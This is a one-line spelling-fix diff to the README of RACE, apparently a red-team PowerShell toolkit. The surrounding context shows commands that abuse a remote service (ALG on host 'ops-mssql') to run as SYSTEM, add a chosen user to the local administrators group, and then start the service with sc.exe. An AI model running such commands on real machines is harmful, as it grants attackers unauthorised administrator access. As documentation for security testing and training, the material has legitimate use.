samratashok/RACE/README.md

 PS C:\> Set-RemoteServiceAbuse -ComputerName ops-mssql -UserName 'labuser' -ServiceName ALG -Verbose
 ```
 Run the above command as 'labuser' to configure ALG to run as SYSTEM and modify its executable path to add 'labuser'
-or other Principal provided in the UserName parameter to the local adminisrators group on the target machines.
+or other Principal provided in the UserName parameter to the local administrators group on the target machines.

 ```powershell
 PS C:\> sc.exe \\ops-mssql start ALG